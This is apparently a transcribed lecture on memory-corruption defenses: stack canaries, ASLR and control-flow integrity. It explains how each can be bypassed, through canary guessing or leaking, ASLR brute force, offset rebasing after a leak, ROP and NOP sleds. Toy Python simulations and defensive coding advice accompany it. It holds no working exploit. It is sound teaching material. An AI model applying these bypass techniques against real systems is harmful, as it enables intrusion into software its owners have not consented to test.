I don't know if they still do it, but apparently canaries' respiratory systems are very sensitive to particles and that kind of thing. So when miners are doing something dangerous where there might be particles or that kind of problem in the air, they bring a canary down there with them. And if the bird dies, that means there's a problem and you need to leave. Yeah, it is kind of terrible, but these are digital canaries, so no canaries were hurt in the making of this. The downside here is that you need to recompile the program in order to add these canaries. And this obviously introduces some overhead, right? On every function return, you have to do this check. Maybe on every function call, you have to set up the canary, right? So all these kinds of overheads. And we saw this: if you've tried to just compile some of these examples and do these simple buffer overflows, you'll see the stack smashing protection, the stack canary. That's why we pass -fno-stack-protector. Yeah, and what they'll also do is rearrange the memory of the function so that it's less likely that the program is exploitable, right? As we saw, if your buffer overflows into local variables, you can control those local variables. So they change the way they compile the program such that the buffers are toward the top and the other local variables are on the bottom, and there's a canary after the buffers but before the saved values. So this actually was a huge problem on, I think, level 13, where I had to rewrite it so that we'd get around this and it would do exactly what we wanted it to do. Yeah, so there are all kinds of ways to protect against stack smashing attacks. Unfortunately, these can be bypassed, right?
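The canary check can be sketched with a toy model of a stack frame in Python. This is only a simulation under assumptions: the 8-byte buffer, the byte values standing in for the saved EBP and saved EIP, and the helper names are all invented here, and the layout follows the order described in the lecture (saved EIP, then canary, then saved base pointer, with the buffer below them).

```python
import secrets

BUF_SIZE = 8
CANARY_AT = BUF_SIZE + 4  # low to high: buffer | saved EBP | canary | saved EIP

# A random canary would be picked fresh on every program run.
RANDOM_CANARY = secrets.token_bytes(4)


def new_frame(canary):
    """Build a toy frame; 0xbb and 0xcc stand in for saved EBP and saved EIP."""
    return bytearray(BUF_SIZE) + b"\xbb" * 4 + canary + b"\xcc" * 4


def unchecked_copy(frame, data):
    """Copy data into the buffer with no bounds check, like strcpy."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def canary_intact(frame, canary):
    """The check that must run before the return instruction."""
    return bytes(frame[CANARY_AT:CANARY_AT + 4]) == canary
```

An 8-byte input leaves the canary alone, while a 20-byte input reaches the saved EIP and necessarily tramples the canary on the way, which is what the check before the return detects.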
So one of the ways is you try to break the canary. Or, if you can overwrite memory and you control the address of where to write, then instead of overflowing the buffer, you just overwrite those four bytes of the return address. If you can figure out roughly where the address of the buffer is, you know the return address is at the address of the buffer plus the size of the buffer, which gets you to the saved EBP, plus another four, and then you can just overwrite that memory address directly, right? So this is another instance where we have a defense mechanism that only captures or prevents a very small segment of vulnerabilities. You can overwrite pointers in the function frame, you can do all kinds of stuff. It helps prevent garden-variety basic stack overflows, but it still doesn't fix all kinds of vulnerabilities. Also, if you have a long-running process, you may be able to guess the canary, right? If it's just a 32-bit value, maybe at some point you'll get it. Or maybe you can leak memory: you can use two vulnerabilities, one to leak some memory and read the canary, and then a second to do the exploit. Other defenses, right? So maybe you got the impression, hopefully, from this part of the class, that guessing addresses is hard, right? You have to be very, very, very precise for these exploits to work, right? So the other idea is, hey, let's make this part harder, make guessing harder. So how do we make guessing things harder? Randomize it. Randomize it, yeah, exactly. Just like we saw with TCP, right? So the next one is address space layout randomization. The idea is, okay, every time the program runs, let's change where the heap, the stack, the code, and the dynamically linked libraries are, right, what their addresses are. Unfortunately, it's not as easy to do as you might think. The stack and the heap are easy, because nobody relies on them being fixed; the addresses of the stack and the heap are supposed to be able to change every time the program runs, right?
But things like the program's code, that's fixed. If you looked at a bunch of objdumps of functions, right, they don't jump to labels, they jump to memory addresses, right? And it's the same thing with dynamically linked libraries, right, that's why we have the global offset table that says where to jump to. So yeah, this is actually really difficult. The libraries have to be rewritten to be position independent, so a lot has to be redone here. And this makes return-to-libc attacks a lot harder, which is good. But on 32-bit systems, you can't just randomize everything freely, right? You can't place things so that the stack and the heap are right next to each other, because they'll run into each other. So there's actually not a lot of entropy in these ASLR systems on 32 bits. So yeah, you could try 32,000 attempts pretty quickly, right, and break that, especially on a server that's running continuously. You only need to get it right once to exploit it. 64-bit architectures make this much more difficult. Unfortunately, like I mentioned, rewriting the program's code is a lot more difficult, so ROP, or return-oriented programming, techniques are still very effective. In addition, with ASLR, oftentimes you're just moving things around as a block, right? Even if you move the code somewhere, usually if I can use one information disclosure vulnerability to find out some bytes of the program, I can easily calculate the offset of where it moved and then change my exploit to match that offset. So yes, it makes things more difficult, but now attackers just chain vulnerabilities together. So ASLR is enabled on Linux, except on our server, where it's disabled. Yeah, the kernel does this with the ELF loader. It does stack ASLR. It doesn't do libraries. Actually, I think it does libraries. There are all kinds of different types of ASLR you can look up if that's something you're interested in.
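The two pieces of arithmetic in this part of the lecture, the brute-force cost and the offset calculation after an information leak, can be sketched in Python. The figure of 16 bits of entropy is an assumption chosen because it lands near the 32,000 attempts mentioned; the lecture does not give the exact number, and the function names and example addresses are made up.

```python
def expected_guesses(entropy_bits):
    """Average number of guesses to hit one of 2**entropy_bits positions,
    assuming the layout stays the same between attempts and no guess is repeated."""
    return (2 ** entropy_bits + 1) / 2


def rebase(leaked_addr, leaked_offset, target_offset):
    """Recover the randomized base from one leaked address, then locate a target.

    leaked_offset and target_offset are the fixed distances from the base,
    known ahead of time from the unrandomized binary or library.
    """
    base = leaked_addr - leaked_offset
    return base + target_offset
```

With the assumed 16 bits, `expected_guesses(16)` is 32768.5. And with a hypothetical leak of `0xb7e5f430` known to sit `0x3f430` past the base, `rebase` puts a target at offset `0x12000` at `0xb7e32000`, which is why a single disclosure undoes the randomization when everything moves together.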
Well, we can disable it. There's actually a way: if you don't want to disable it for the entire system, you can run a bash instance with ASLR disabled so that you can test these things out. As we've seen with many types of randomization, if we can guess or just brute force it, then we're good, right? And as we saw, we can make the NOP sled as big as we want, it doesn't really matter. We can make it very, very, very large, right? So even if you randomize things, if you're trying to hit a large target that's only slightly moved, it's not going to take that much to hit it. So yeah, you either have to leak the address or hijack the control flow some other way, basically use some kind of ROP attack that's reusing code that's already there. Okay, the other technique: people say, okay, the basic problem when you boil all of these attacks down is that the program has some control flow, right? This function should call this function, which should call this function, and then it should return back up that chain, right? So this is the control flow of the program. You can statically look at a program and understand its control flow. So why don't we enforce that at runtime and say that a function can only call functions that it knows about, and it can only return to functions that could have called it, right? What about function pointers? It kind of works with function pointers. I mean, you can statically analyze it and see, okay, function A calls B, and B is only called from A or C. That means when B returns, it had better only go to A or C, otherwise I know there's some type of vulnerability, right? And you could do this for every return statement in your program and automatically enforce it. So this was a paper at CCS 2005. And so, yeah, you basically try to figure out all the control flow of the program and you enforce it at runtime.
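The A, B, C example can be written down as a tiny Python sketch of a return check. This is a simplification under assumptions: functions are represented by name rather than by address, the table is typed in by hand instead of coming from static analysis, and `return_allowed` is a hypothetical helper.

```python
# Statically derived table: for each function, the set of functions that call it.
# Here B is only ever called from A or C, as in the example above.
CALLERS = {"B": {"A", "C"}}


def return_allowed(callee, return_target):
    """Allow a return only into a function that could have called the callee."""
    return return_target in CALLERS.get(callee, set())
```

So `return_allowed("B", "A")` and `return_allowed("B", "C")` pass, while a return from B into anything else is flagged. Note that the check accepts C even on a run where A made the call, because it only consults the static table.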
The problem is that there was just recently a paper at USENIX Security called Control-Flow Bending that said that in a large application, right, you have functions that are called from multiple different functions, right? And this type of check is kind of imprecise. When the function is called, it can only return to some place that I've seen statically that it could be called from, but the check doesn't verify that that's actually who called it in this instance. So they showed that in a large program, there's actually enough variation in the control flow graph that you can execute arbitrary computations, reusing what already exists in the graph. So it's not the panacea that we kind of hoped for. And all these techniques assume a very strong attacker who can read or write any memory address, right? Once they can do that, it's kind of game over. All right, we're in the endgame here. So just to go over things from a tools perspective. You've been writing shellcode, which is awesome. Hopefully you found some tools or some other cool things. Metasploit is a whole framework and tool set that supports exploitation and remote code execution. It has some cool things: you can choose different types of shellcode and you can tell it what characters are not allowed, so it can do some polymorphic shellcode. It has a free version you can download, run, and test out. It also has, I believe, actual reliable exploits for different CVE vulnerabilities. Do not run these or test these on real systems, right? This is your daily ethical reminder to not do that. If you want to get into this more, Kali Linux is a Linux distribution that has a bunch of security tools already pre-installed, so you don't need to find and install them yourself. Kind of fun to play around with.
And so basically, as we've seen, right, you find a vulnerability, choose a payload, figure out how to encode that payload for the program, and try to exploit that program. So anyway, we've seen all the different ways that applications can be exploited, right? This class should make you incredibly paranoid, right? As software developers, don't trust anything. argv, don't trust it. argv[0], don't trust it. Input from the user, don't trust it. Input from the network, don't trust it, right? All of this can be controlled by an attacker, right? So you need to code very defensively. We saw unexpected inputs. We saw the environment, right? The PATH variable can completely change the execution of the program. The HOME environment variable too. And oftentimes it's not explicit in the application that it's using these variables, right? It's often relying on a library function which is using those environment variables. So you really have to think about, okay, how can I sanitize things? How can I make sure things are safe? And how can I understand these environment dependencies? In my mind, I see everything hopefully moving towards, I don't know if Rust is the answer, or one of these other languages, maybe Go, probably not Go, but some kind of language that provides memory safety, which helps mitigate a lot of these vulnerabilities. But don't be lured into a false sense of security, thinking, I'm coding in Java, there can never be a security problem in my application, right? Not only are there other types of vulnerabilities that we'll talk about, web vulnerabilities that still exist in every language, but there are attacks on the logic of the application, right? One of the classic examples is, in an e-commerce application, being able to purchase a negative quantity of an item, right? So I buy, like, two MacBooks, negative two MacBooks, and an adapter. And so then I paid $30 for two MacBooks, right?
If it allowed me to do that, right? And here, there's no memory corruption or anything. The application is doing exactly what it was written to do, but the logic of that application is wrong. Right. Cool. All right. That's as far as we'll get today, and we'll start on web on Wednesday.
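The negative-quantity example above can be sketched in a few lines of Python. The prices (1000 for a MacBook, 30 for an adapter) and the function names are assumptions made up for the illustration; the point is only that the first function is memory safe and still wrong.

```python
PRICES = {"macbook": 1000, "adapter": 30}  # hypothetical prices in dollars


def cart_total(cart):
    """Flawed logic: trusts whatever quantity the client sent."""
    return sum(PRICES[item] * qty for item, qty in cart)


def cart_total_checked(cart):
    """Same computation, but rejects quantities that make no business sense."""
    for item, qty in cart:
        if qty <= 0:
            raise ValueError(f"invalid quantity {qty} for {item}")
    return cart_total(cart)
```

With the cart `[("macbook", 2), ("macbook", -2), ("adapter", 1)]`, `cart_total` comes out to 30, while `cart_total_checked` raises a `ValueError` before any total is computed.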